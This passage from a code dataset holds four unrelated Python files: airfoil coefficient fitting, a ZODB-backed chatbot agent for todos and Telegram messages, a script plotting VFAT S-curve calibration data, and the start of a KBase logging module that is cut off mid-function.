fig.canvas.mpl_connect('pick_event', on_pick)\n plt.show(block=True)\n plt.ioff()\n\n # Trim arrays\n self._selected_ind = sorted(self._selected_ind)\n if len(self._selected_ind) != 2:\n raise RuntimeError(\"No points were selected to determine the linear region.\")\n alpha = np.radians(alpha[self._selected_ind[0]:self._selected_ind[1]+1])\n CL = CL[self._selected_ind[0]:self._selected_ind[1]+1]\n Cm = Cm[self._selected_ind[0]:self._selected_ind[1]+1]\n CD = CD[self._selected_ind[0]:self._selected_ind[1]+1]\n\n else:\n alpha = np.radians(alpha)\n\n # Get CL model\n coef_array = np.polyfit(alpha, CL, 1)\n self._aL0 = coef_array[1]\n self._CLa = coef_array[0]\n self._CL_max = np.max(CL)\n\n # Get Cm model\n coef_array = np.polyfit(alpha, Cm, 1)\n self._Cma = coef_array[0]\n self._CmL0 = self._Cma*self._aL0+coef_array[1]\n\n # Get CD model\n coef_array = np.polyfit(CL, CD, 2)\n self._CD0 = coef_array[2]\n self._CD1 = coef_array[1]\n self._CD2 = coef_array[0]\n\n # Plot model within linear region\n if kwargs.get(\"plot_model\", False):\n\n # CL\n plt.close('all')\n fig, (ax0, ax1, ax2) = plt.subplots(nrows=1, ncols=3)\n fig.suptitle(\"Linear Model for {0}\".format(self.name))\n ax0.set_title(\"CL\")\n ax0.plot(alpha, CL, \"gx\", label=\"Data\")\n ax0.plot(alpha, alpha*self._CLa+self._aL0, \"g-\", label=\"Model\")\n ax0.legend()\n ax0.set_xlabel(\"Angle of Attack [rad]\")\n ax0.set_ylabel(\"Lift Coefficient\")\n\n # Cm\n ax1.set_title(\"Cm\")\n ax1.plot(alpha, Cm, 'bx', label=\"Data\")\n ax1.plot(alpha, (alpha-self._aL0)*self._Cma+self._CmL0, \"b-\", label=\"Model\")\n ax1.legend()\n ax1.set_xlabel(\"Angle of Attack [rad]\")\n ax1.set_ylabel(\"Moment Coefficient\")\n\n # CD\n ax2.set_title(\"CD\")\n ax2.plot(CL, CD, 'rx', label=\"Data\")\n ax2.plot(CL, self._CD0+self._CD1*CL+self._CD2*CL*CL, 'r-', label=\"Model\")\n ax2.legend()\n ax2.set_xlabel(\"Lift Coefficient\")\n ax2.set_ylabel(\"Drag Coefficient\")\n plt.show()\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self._type = \"linear\"\n\n\n def export_linear_model(self, **kwargs):\n \"\"\"Exports the linear coefficients used to predict the behavior of the airfoil.\n\n Parameters\n ----------\n filename : str\n JSON file to export the model data to.\n \"\"\"\n\n # Check there is a model to export\n if not hasattr(self, \"_aL0\"):\n raise RuntimeError(\"A linear model for {0} could not be exported because it has none.\".format(self.name))\n\n # Parse coefficients\n model_dict = {\n \"aL0\" : self._aL0,\n \"CLa\" : self._CLa,\n \"CmL0\" : self._CmL0,\n \"Cma\" : self._Cma,\n \"CD0\" : self._CD0,\n \"CD1\" : self._CD1,\n \"CD2\" : self._CD2,\n \"CL_max\" : self._CL_max\n }\n\n # Export\n filename = kwargs.get(\"filename\")\n with open(filename, 'w') as export_file_handle:\n json.dump(model_dict, export_file_handle, indent=4)\n","sub_path":"airfoil_db/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":115083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"566765188","text":"# coding=utf-8\nimport atexit\nimport time\n\nimport os\nimport random\nimport persistent\nimport transaction\nfrom BTrees.OOBTree import OOBTree\nfrom zentropi import (\n Agent,\n on_message,\n)\nfrom ZODB import DB, FileStorage\n\n\nclass Todo(persistent.Persistent):\n def __init__(self, items=None):\n self.items = items or []\n\n def add_item(self, item: str):\n self.items.append(item)\n self._p_changed = True\n transaction.commit()\n return len(self.items) - 1\n\n def mark_done(self, index: int):\n del self.items[index]\n self._p_changed = True\n transaction.commit()\n\n\nclass Activity(persistent.Persistent):\n def __init__(self):\n self.stack = []\n self.log = {} # type: dict\n\n def track_activity(self, activity):\n self.log.update({time.time(): activity})\n if self.stack[-1] == activity:\n # track only changes in the stack\n return\n self.stack.append(activity)\n\n\nDB_CLASSES = {\n 'activity': Activity,\n 'location': OOBTree,\n 'notification': OOBTree,\n 'todo': Todo,\n}\n\nFAQS = \"\"\"\\\nwhat can you do\nwhat functions do you have\n---\nI can track your TODOs, bookmark & search your favorite webpages \nor you can teach me how to operate other agents in your home.\n\"\"\"\nFAQS = FAQS.strip().split('===')\nFAQS = [faq.strip().split('---') for faq in FAQS]\nFAQS = [[q.strip().split('\\n'), a.strip().replace('\\n', ' ').replace(' ', ' ')] for (q, a) in FAQS]\n\n\ndef format_list(lst):\n return '\\n'.join(['{}: {}'.format(i, v) for i, v in enumerate(lst)])\n\n\nclass Maya(Agent):\n def __init__(self, name=None):\n super().__init__(name=name)\n self.zodb_connection = None\n self.zodb_db = None\n self.zodb_storage = None\n self.states.activity = ''\n self.setup_faqs()\n self.db = self.load_db('~/.mayaisabot/mayaisabot.fs')\n\n def load_db(self, file_name):\n file_name = os.path.expanduser(file_name)\n print('*** Loading db {!r}'.format(file_name))\n storage = FileStorage.FileStorage(file_name)\n db = DB(storage)\n conn = db.open()\n root = conn.root()\n for table_name, table_class in DB_CLASSES.items():\n if not hasattr(root, table_name):\n setattr(root, table_name, table_class())\n print('*** Created table {!r}'.format(table_name))\n self.zodb_connection = conn\n self.zodb_db = db\n self.zodb_storage = storage\n atexit.register(self.save_db)\n return root\n\n def save_db(self):\n print('*** Saving db...')\n self.zodb_connection.close()\n self.zodb_db.close()\n self.zodb_storage.close()\n\n def setup_faqs(self):\n for questions, answer in FAQS:\n for q in questions:\n print('***', q, answer)\n self.on_message(q, fuzzy=True)(lambda _: answer)\n\n @on_message('hey')\n @on_message('hi')\n @on_message('hello')\n @on_message('hello {}', parse=True)\n async def greeting(self, message):\n if message.source == self.name:\n return\n return '{}! What can I do for you?'.format(\n random.choice(\"Hey, Hi, Hello, Hey there\"\n \"\".split(',')).strip())\n\n @on_message('todo {item}', parse=True)\n def todo_add(self, message):\n item = message.data.item\n index = self.db.todo.add_item(item)\n return 'Saved {}: {}'.format(index, item)\n\n @on_message('todos')\n def todo_list(self, message):\n items = self.db.todo.items\n return format_list(items) or 'No todo items.'\n\n @on_message('done {index}', parse=True)\n def todo_done(self, message):\n try:\n index = int(message.data.index)\n except ValueError:\n return 'Expected an integer, got: {!r}'.format(message.data.index)\n if 0 <= index < len(self.db.todo.items):\n item = self.db.todo.items[index]\n self.db.todo.mark_done(index)\n return '{}{!r} is done!'.format(\n random.choice(['Whoohoo! ', 'Super! ', '', '', '']),\n item,\n )\n return 'Expected 0 <= index < {}, got: {}'.format(\n len(self.db.todo.items), index)\n\n @on_message('tg {chat_id} {text}', parse=True)\n def send_tg_message(self, message):\n text = message.data.text\n chat_id = message.data.chat_id\n if not text:\n return\n self.emit('send_telegram_message', data={'text': text, 'chat_id': chat_id})\n","sub_path":"src/mayaisabot/maya.py","file_name":"maya.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"36109877","text":"from rw_reg_lpgbt import *\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as mcolors\r\nfrom matplotlib import cm\r\nimport numpy as np\r\nimport os, sys, glob\r\nimport argparse\r\n\r\nplt.rcParams.update({\"font.size\": 22}) # Increase font size\r\n\r\ndef getCalData(calib_path):\r\n slope_adc = {}\r\n intercept_adc = {}\r\n\r\n if os.path.isfile(calib_path):\r\n calib_file = open(calib_path)\r\n for line in calib_file.readlines():\r\n if \"vfat\" in line:\r\n continue\r\n vfat = int(line.split(\";\")[0])\r\n slope_adc[vfat] = float(line.split(\";\")[2])\r\n intercept_adc[vfat] = float(line.split(\";\")[3])\r\n calib_file.close()\r\n\r\n return slope_adc, intercept_adc\r\n\r\ndef DACToCharge(dac, slope_adc, intercept_adc, current_pulse_sf, vfat, mode):\r\n \"\"\"\r\n Slope and intercept for all VFATs from the CAL_DAC cal file.\r\n If cal file not present, use default values here are a rough average of cal data.\r\n \"\"\"\r\n\r\n slope = -9999\r\n intercept = -9999\r\n\r\n if vfat in slope_adc:\r\n if slope_adc[vfat]!=-9999 and intercept_adc[vfat]!=-9999:\r\n if mode==\"voltage\":\r\n slope = slope_adc[vfat]\r\n intercept = intercept_adc[vfat]\r\n elif mode==\"current\":\r\n slope = abs(slope_adc[vfat])\r\n intercept = 0\r\n if slope==-9999 or intercept==-9999: # use average values\r\n print (Colors.YELLOW + \"ADC Cal data not present for VFAT%d, using avergae values\"%vfat + Colors.ENDC)\r\n if mode==\"voltage\":\r\n slope = -0.22 # fC/DAC\r\n intercept = 56.1 # fC\r\n elif mode==\"current\":\r\n slope = 0.22 # fC/DAC\r\n intercept = 0\r\n charge = (dac * slope) + intercept\r\n if mode == \"current\":\r\n charge = charge * current_pulse_sf\r\n return charge\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Parsing arguments\r\n parser = argparse.ArgumentParser(description=\"Plotting VFAT SCurve\")\r\n parser.add_argument(\"-f\", \"--filename\", action=\"store\", dest=\"filename\", help=\"SCurve result filename\")\r\n #parser.add_argument(\"-t\", \"--type\", action=\"store\", dest=\"type\", help=\"type = daq or sbit\")\r\n parser.add_argument(\"-m\", \"--mode\", action=\"store\", dest=\"mode\", help=\"mode = voltage or current\")\r\n parser.add_argument(\"-c\", \"--channels\", action=\"store\", nargs=\"+\", dest=\"channels\", help=\"Channels to plot for each VFAT\")\r\n parser.add_argument(\"-fs\", \"--cal_fs\", action=\"store\", dest=\"cal_fs\", help=\"cal_fs = value of CAL_FS used (0-3), default = taken from VFAT config text file\")\r\n args = parser.parse_args()\r\n\r\n if args.channels is None:\r\n print(Colors.YELLOW + \"Enter channel list to plot SCurves\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n if args.mode not in [\"voltage\", \"current\"]:\r\n print(Colors.YELLOW + \"Mode can only be voltage or current\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n #if args.type not in [\"daq\", \"sbit\"]:\r\n # print(Colors.YELLOW + \"Type can only be daq or sbit\" + Colors.ENDC)\r\n # sys.exit()\r\n\r\n directoryName = args.filename.split(\".txt\")[0]\r\n plot_filename_prefix = (directoryName.split(\"/\"))[2]\r\n oh = plot_filename_prefix.split(\"_vfat\")[0]\r\n file = open(args.filename)\r\n\r\n try:\r\n os.makedirs(directoryName) # create directory for scurve analysis results\r\n except FileExistsError: # skip if directory already exists\r\n pass\r\n\r\n cal_fs = -9999\r\n if args.cal_fs is None:\r\n vfat_config_path = \"vfat_data/\"+oh+\"_vfatConfig.txt\"\r\n if not os.path.isfile(vfat_config_path):\r\n print(Colors.YELLOW + \"VFAT config file not present, provide CAL_FS used\" + Colors.ENDC)\r\n sys.exit()\r\n file_config = open(vfat_config_path)\r\n for line in file_config.readlines():\r\n if \"CFG_CAL_FS\" in line:\r\n cal_fs = int(line.split()[1])\r\n break\r\n file_config.close()\r\n else:\r\n cal_fs = int(args.cal_fs)\r\n if cal_fs > 3:\r\n print(Colors.YELLOW + \"CAL_FS can be only 0-3\" + Colors.ENDC)\r\n sys.exit()\r\n current_pulse_sf = -9999\r\n if cal_fs == 0:\r\n current_pulse_sf = 0.25\r\n elif cal_fs == 1:\r\n current_pulse_sf = 0.50\r\n elif cal_fs == 2:\r\n current_pulse_sf = 0.75\r\n elif cal_fs == 3:\r\n current_pulse_sf = 1.00\r\n if current_pulse_sf == -9999:\r\n print(Colors.YELLOW + \"invalid Current Pulse SF\" + Colors.ENDC)\r\n sys.exit()\r\n\r\n calib_path = \"vfat_data/vfat_calib_data/\"+oh+\"_vfat_calib_info_calDac.txt\"\r\n slope_adc, intercept_adc = getCalData(calib_path)\r\n\r\n scurve_result = {}\r\n for line in file.readlines():\r\n if \"vfat\" in line:\r\n continue\r\n\r\n vfat = int(line.split()[0])\r\n channel = int(line.split()[1])\r\n charge = int(line.split()[2])\r\n fired = int(line.split()[3])\r\n events = int(line.split()[4])\r\n\r\n #if args.mode == \"voltage\":\r\n # charge = 255 - charge\r\n charge = DACToCharge(charge, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode) # convert to fC\r\n\r\n if vfat not in scurve_result:\r\n scurve_result[vfat] = {}\r\n if channel not in scurve_result[vfat]:\r\n scurve_result[vfat][channel] = {}\r\n if fired == -9999 or events == -9999 or events == 0:\r\n scurve_result[vfat][channel][charge] = 0\r\n else:\r\n scurve_result[vfat][channel][charge] = float(fired)/float(events)\r\n file.close()\r\n\r\n channelNum = np.arange(0, 128, 1)\r\n chargeVals = np.arange(0, 256, 1)\r\n\r\n numVfats = len(scurve_result.keys())\r\n if numVfats == 1:\r\n fig1, ax1 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n cf1 = 0\r\n cbar1 = 0\r\n elif numVfats <= 3:\r\n fig1, ax1 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 6:\r\n fig1, ax1 = plt.subplots(2, 3, figsize=(30,20))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 12:\r\n fig1, ax1 = plt.subplots(2, 6, figsize=(60,20))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 18:\r\n fig1, ax1 = plt.subplots(3, 6, figsize=(60,30))\r\n cf1 ={}\r\n cbar1 ={}\r\n elif numVfats <= 24:\r\n fig1, ax1 = plt.subplots(4, 6, figsize=(60,40))\r\n cf1 ={}\r\n cbar1 ={}\r\n\r\n vfatCnt0 = 0\r\n for vfat in scurve_result:\r\n fig, axs = plt.subplots(figsize=(10,10))\r\n axs.set_xlabel(\"Channel number\", loc = 'right')\r\n axs.set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n #axs.xlim(0,128)\r\n #axs.ylim(0,256)\r\n\r\n plot_data = []\r\n plot_data_x = []\r\n plot_data_y = []\r\n for dac in range(0,256):\r\n charge = DACToCharge(dac, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n plot_data_y.append(charge)\r\n data = []\r\n for channel in range(0,128):\r\n if channel not in scurve_result[vfat]:\r\n data.append(0)\r\n elif charge not in scurve_result[vfat][channel]:\r\n data.append(0)\r\n else:\r\n data.append(scurve_result[vfat][channel][charge])\r\n plot_data.append(data)\r\n for channel in range(0,128):\r\n plot_data_x.append(channel)\r\n\r\n cf = plt.pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n #chargeVals_mod = chargeVals\r\n #for i in range(0,len(chargeVals_mod)):\r\n # chargeVals_mod[i] = DACToCharge(chargeVals_mod[i], slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n #plot = axs.imshow(plot_data, extent=[min(channelNum), max(channelNum), min(chargeVals_mod), max(chargeVals_mod)], origin=\"lower\", cmap=cm.ocean_r,interpolation=\"nearest\", aspect=\"auto\")\r\n cbar = fig.colorbar(cf, ax=axs, pad=0.01)\r\n cbar.set_label(\"Fired events / total events\", loc = 'top')\r\n axs.set_title(\"VFAT%02d\"%vfat)\r\n axs.set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n axs.text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=axs.transAxes)\r\n axs.text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=axs.transAxes)\r\n fig.tight_layout()\r\n fig.savefig((directoryName+\"/scurve2Dhist_\"+oh+\"_VFAT%02d.pdf\")%vfat)\r\n plt.close(fig)\r\n\r\n if numVfats == 1:\r\n ax1.set_xlabel(\"Channel number\", loc = 'right')\r\n ax1.set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1.set_title(\"VFAT%02d\"%vfat)\r\n cf1 = ax1.pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1 = fig1.colorbar(cf1, ax=ax1, pad=0.01)\r\n cbar1.set_label(\"Fired events / total events\", loc = 'top')\r\n ax1.set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1.text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1.transAxes)\r\n ax1.text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1.transAxes)\r\n elif numVfats <= 3:\r\n ax1[vfatCnt0].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[vfatCnt0].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[vfatCnt0].set_title(\"VFAT%02d\"%vfat)\r\n cf1[vfatCnt0] = ax1[vfatCnt0].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[vfatCnt0] = fig1.colorbar(cf1[vfatCnt0], ax=ax1[vfatCnt0], pad=0.01)\r\n cbar1[vfatCnt0].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[vfatCnt0].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[vfatCnt0].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1[vfatCnt0].transAxes)\r\n ax1[vfatCnt0].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[vfatCnt0].transAxes)\r\n elif numVfats <= 6:\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_title(\"VFAT%02d\"%vfat)\r\n cf1[int(vfatCnt0/3), vfatCnt0%3] = ax1[int(vfatCnt0/3), vfatCnt0%3].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[int(vfatCnt0/3), vfatCnt0%3] = fig1.colorbar(cf1[int(vfatCnt0/3), vfatCnt0%3], ax=ax1[int(vfatCnt0/3), vfatCnt0%3], pad=0.01)\r\n cbar1[int(vfatCnt0/3), vfatCnt0%3].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n ax1[int(vfatCnt0/3), vfatCnt0%3].text(0.015, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n else:\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_xlabel(\"Channel number\", loc = 'right')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_ylabel(\"Injected charge (fC)\", loc = 'top')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_title(\"VFAT%02d\"%vfat)\r\n cf1[int(vfatCnt0/6), vfatCnt0%6] = ax1[int(vfatCnt0/6), vfatCnt0%6].pcolormesh(plot_data_x, plot_data_y, plot_data, cmap=cm.ocean_r, shading=\"nearest\")\r\n cbar1[int(vfatCnt0/6), vfatCnt0%6] = fig1.colorbar(cf1[int(vfatCnt0/6), vfatCnt0%6], ax=ax1[int(vfatCnt0/6), vfatCnt0%6], pad=0.01)\r\n cbar1[int(vfatCnt0/6), vfatCnt0%6].set_label(\"Fired events / total events\", loc = 'top')\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].set_xticks(np.arange(min(channelNum), max(channelNum)+1, 20))\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].text(-0.1, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax1[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n ax1[int(vfatCnt0/6), vfatCnt0%6].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax1[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n\r\n vfatCnt0+=1\r\n\r\n fig1.tight_layout()\r\n fig1.savefig((directoryName+\"/scurve2Dhist_\"+oh+\".pdf\"))\r\n plt.close(fig1)\r\n\r\n\r\n if numVfats <= 3:\r\n fig2, ax2 = plt.subplots(1, numVfats, figsize=(numVfats*10,10))\r\n leg2 = 0\r\n elif numVfats <= 6:\r\n fig2, ax2 = plt.subplots(2, 3, figsize=(30,20))\r\n leg2 ={}\r\n elif numVfats <= 12:\r\n fig2, ax2 = plt.subplots(2, 6, figsize=(60,20))\r\n leg2 ={}\r\n elif numVfats <= 18:\r\n fig2, ax2 = plt.subplots(3, 6, figsize=(60,30))\r\n leg2 ={}\r\n elif numVfats <= 24:\r\n fig2, ax2 = plt.subplots(4, 6, figsize=(60,40))\r\n leg2 ={}\r\n\r\n vfatCnt0 = 0\r\n for vfat in scurve_result:\r\n fig, ax = plt.subplots(figsize=(12,10))\r\n ax.set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax.set_ylabel(\"Fired events / total events\", loc = 'top')\r\n #if args.type == \"daq\":\r\n # plt.ylim(-0.1,1.1)\r\n #else:\r\n # plt.ylim(-0.1,2.1)\r\n\r\n for channel in args.channels:\r\n channel = int(channel)\r\n if channel not in scurve_result[vfat]:\r\n print (Colors.YELLOW + \"Channel %d not in SCurve scan\"%channel + Colors.ENDC)\r\n continue\r\n dac = range(0,256)\r\n charge_plot = []\r\n frac = []\r\n for d in dac:\r\n c = DACToCharge(d, slope_adc, intercept_adc, current_pulse_sf, vfat, args.mode)\r\n if c in scurve_result[vfat][channel]:\r\n charge_plot.append(c)\r\n frac.append(scurve_result[vfat][channel][c])\r\n ax.grid()\r\n\r\n ax.plot(charge_plot, frac, \"o\",markersize = 6, label=\"Channel %d\"%channel)\r\n ax.text(-0.1, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax.transAxes)\r\n ax.text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax.transAxes)\r\n if numVfats == 1:\r\n ax2.grid()\r\n ax2.plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n elif numVfats <= 3:\r\n ax2[vfatCnt0].grid()\r\n ax2[vfatCnt0].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n elif numVfats <= 6:\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].grid()\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n else:\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].grid()\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].plot(charge_plot, frac, \"o\", markersize = 6, label=\"Channel %d\"%channel)\r\n leg = ax.legend(loc=\"center right\", ncol=2)\r\n ax.set_title(\"VFAT%02d\"%vfat)\r\n fig.savefig((directoryName+\"/scurve_\"+oh+\"_VFAT%02d.pdf\")%vfat)\r\n plt.close(fig)\r\n\r\n if numVfats == 1:\r\n ax2.set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2.set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2.set_title(\"VFAT%02d\"%vfat)\r\n leg2 = ax2.legend(loc=\"center right\", ncol=2)\r\n ax2.text(-0.09, 1.01, 'CMS', fontweight='bold', fontsize=26, transform=ax2.transAxes)\r\n ax2.text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=24, transform=ax2.transAxes)\r\n elif numVfats <= 3:\r\n ax2[vfatCnt0].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[vfatCnt0].set_ylabel(\"Fired events / total events\", loc = 'top')\r\n ax2[vfatCnt0].set_title(\"VFAT%02d\"%vfat)\r\n leg2[vfatCnt0] = ax2[vfatCnt0].legend(loc=\"center right\", ncol=2)\r\n ax2[vfatCnt0].text(-0.09, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[vfatCnt0].transAxes)\r\n ax2[vfatCnt0].text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[vfatCnt0].transAxes)\r\n elif numVfats <= 6:\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_ylabel(\"Fired Events / Total Events\", loc = 'top')\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].set_title(\"VFAT%02d\"%vfat)\r\n leg2[int(vfatCnt0/3), vfatCnt0%3] = ax2[int(vfatCnt0/3), vfatCnt0%3].legend(loc=\"center right\", ncol=2)\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].text(-0.11, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n ax2[int(vfatCnt0/3), vfatCnt0%3].text(0.02, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[int(vfatCnt0/3), vfatCnt0%3].transAxes)\r\n else:\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_xlabel(\"Injected charge (fC)\", loc = 'right')\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_ylabel(\"Fired Events / Total Events\", loc = 'top')\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].set_title(\"VFAT%02d\"%vfat)\r\n leg2[int(vfatCnt0/6), vfatCnt0%6] = ax2[int(vfatCnt0/6), vfatCnt0%6].legend(loc=\"center right\", ncol=2)\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].text(-0.12, 1.01, 'CMS', fontweight='bold', fontsize=28, transform=ax2[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n ax2[int(vfatCnt0/6), vfatCnt0%6].text(0.01, 1.01, 'Muon R&D',fontstyle='italic', fontsize=26, transform=ax2[int(vfatCnt0/6), vfatCnt0%6].transAxes)\r\n\r\n\r\n vfatCnt0+=1\r\n\r\n fig2.tight_layout()\r\n fig2.savefig((directoryName+\"/scurve_\"+oh+\".pdf\"))\r\n plt.close(fig2)\r\n\r\n print(Colors.GREEN + 'Plots saved at %s' % directoryName + Colors.ENDC)\r\n\r\n\r\n\r\n\r\n","sub_path":"lpgbt_vfat_plot_scurve.py","file_name":"lpgbt_vfat_plot_scurve.py","file_ext":"py","file_size_in_byte":17846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"67427358","text":"\"\"\"\nCommon narrative logging functions.\n\nOther biokbase modules can use the logging like this:\n\n from biokbase.narrative.common.kblogging import get_logger\n _log = get_logger(__name__)\n\nLog messages are free-form, *but* the MongoDB handler will break any\nparts of the message in the form '=' into their own fields\nin the MongoDB record.\n\nLogging to MongoDB will be enabled, via proxy, if the proxy is\nrunning on the pre-configured host/port\n\"\"\"\n__author__ = 'Dan Gunter '\n__date__ = '2014-07-31'\n\nimport logging\nfrom logging.handlers import SocketHandler\nimport os\nimport re\nimport socket\n# IPython\nimport IPython\n# Local\nfrom .util import kbase_env\nfrom . import log_proxy\n\n## Constants\n\nKBASE_TMP_DIR = \"/tmp\"\nKBASE_TMP_LOGFILE = os.path.join(KBASE_TMP_DIR, \"kbase-narrative.log\")\n\n# env var with location of proxy config file\nKBASE_PROXY_ENV = 'KB_PROXY_CONFIG'\n\n## Functions\n\ndef get_logger(name=\"\"):\n \"\"\"Get a given KBase log obj.\n\n :param name: name (a.b.c) of the logging namespace, which may be\n relative or absolute (starting with 'biokbase.'), or\n empty in which case the root logger is returned\n :return: Log object\n :rtype: logging.Logger\n \"\"\"\n # no name => root\n if not name:\n log = logging.getLogger(\"biokbase\")\n # absolute name\n elif name.startswith(\"biokbase.\"):\n log = logging.getLogger(name)\n # relative name\n else:\n log = logging.getLogger(\"biokbase.\" + name)\n\n adapter = LogAdapter(log, _get_meta())\n\n return adapter\n\ndef log_event(log, event, mapping):\n \"\"\"Log an event and a mapping.\n \"\"\"\n kvp = \" \".join([\"{}={}\".format(k, v) for k, v in mapping.iteritems()])\n log.info(\"{}{}{}\".format(event, log_proxy.EVENT_MSG_SEP, kvp))\n\nclass LogAdapter(logging.LoggerAdapter):\n \"\"\"\n Add some extra methods to the stock LoggerAdapter\n \"\"\"\n def __init__(self, log, extra):\n logging.LoggerAdapter.__init__(self, log, extra)\n self.handlers = log.handlers\n self.addHandler = log.addHandler\n self.removeHandler = log.removeHandler\n self.setLevel = log.setLevel\n self.isEnabledFor = log.isEnabledFor\n\ndef _get_meta():\n meta = {}\n\n\n # Auth values\n token = kbase_env.auth_token\n\n if token:\n # User\n m = re.search('un=([^|]+)', token)\n if m is not None:\n meta['user'] = m.group(1)\n\n # Session id\n sess = kbase_env.session\n if sess:\n meta['session_id'] = sess\n\n # Notebook name\n if kbase_env.narrative:\n meta['narr'] = kbase_env.narrative\n\n return meta\n\n\nclass MetaFormatter(logging.Formatter):\n def __init__(self):\n \"\"\"\n Format with metadata in the mix.\n \"\"\"\n logging.Formatter.__init__(\n self,\n \"%(levelname)s %(asctime)s %(name)s %(message)s\")\n\n def format(self, record):\n \"\"\"\n Add KB_* environment values at format time.\n \"\"\"\n s = logging.Formatter.format(self, record)\n return \"{} [{}]\".format(s, ' '.join([\"{}={}\".format(k, v)\n for k, v in os.environ.items()\n if k.startswith('KB_')]))\n\n\ndef init_handlers():\n \"\"\"\n Initialize and add the log handlers.\n \"\"\"\n # Turn on debugging by setting environment variable KBASE_DEBUG.\n if os.environ.get(\"KBASE_DEBUG\", None):\n g_log.setLevel(logging.DEBUG)\n else:\n g_log.setLevel(logging.INFO)\n\n # Add log handler and assoc. formatter for metadata\n hndlr = 